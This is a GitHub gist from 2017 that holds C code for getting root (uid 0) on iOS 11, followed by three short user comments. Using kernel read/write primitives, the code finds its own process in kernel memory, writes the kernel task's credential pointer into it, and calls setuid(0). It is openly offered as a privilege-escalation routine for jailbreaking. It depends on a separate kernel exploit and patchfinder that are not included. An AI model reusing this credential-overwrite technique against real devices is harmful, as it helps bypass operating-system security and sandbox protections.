Create a gist now

Instantly share code, notes, and snippets.

@iabem97 /gist:d11e61afa7a0d0a9f2b5a1e42ee505d8
Created Dec 12, 2017

Embed
What would you like to do?
Download ZIP
get uid: 0 - iOS 11
Raw
gistfile1.txt
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
* Purpose: iterates over the procs and finds our proc
*/
uint64_t get_our_proc() {
uint64_t task_self = task_self_addr();
uint64_t struct_task = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
while (struct_task != 0) {
uint64_t bsd_info = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
// get the process pid
uint32_t pid = rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
if(pid == getpid()) {
return bsd_info;
}
struct_task = rk64(struct_task + koffset(KSTRUCT_OFFSET_TASK_PREV));
}
return -1; // we failed :/
}
kern_return_t get_root () {
kern_return_t ret = KERN_SUCCESS;
uint64_t our_proc = get_our_proc();
if(our_proc == -1) {
printf("[ERROR]: no our proc. wut\n");
ret = KERN_FAILURE;
return ret;
}
extern uint64_t kernel_task;
printf("[INFO]: kernel_task: %llx\n", kernel_task); // BSD_INFO
uint64_t kern_ucred = kread_uint64(kernel_task + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */);
printf("[INFO]: kern_ucred: %llx\n", kern_ucred);
uint64_t offsetof_p_csflags = 0x2a8;
uint32_t csflags = kread_uint32(our_proc + offsetof_p_csflags);
uint64_t our_cred = kread_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */);
kwrite_uint64(our_proc + 0x100 /* KSTRUCT_OFFSET_PROC_UCRED */, kern_ucred);
printf("[INFO]: successfully wrote our kern_ucred into our cred!\n");
setuid(0);
printf("[INFO]: getuid: %d\n", getuid());
int fd = open("/var/mobile/xxx", O_WRONLY);
// you'll probably panic few seconds after this thanks to the new sandbox protections
return ret;
}
@MODZ4FUN420

This comment has been minimized.

Show comment
Hide comment
@MODZ4FUN420

MODZ4FUN420 Dec 12, 2017

Will this be made into a API?

MODZ4FUN420 commented Dec 12, 2017

Will this be made into a API?
@simsdj

This comment has been minimized.

Show comment
Hide comment
@simsdj

simsdj Dec 13, 2017

What even is this

simsdj commented Dec 13, 2017

What even is this
@arinc9

This comment has been minimized.

Show comment
Hide comment
@arinc9

arinc9 Dec 13, 2017

Stop lowering the IQ of this place.

arinc9 commented Dec 13, 2017

Stop lowering the IQ of this place.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment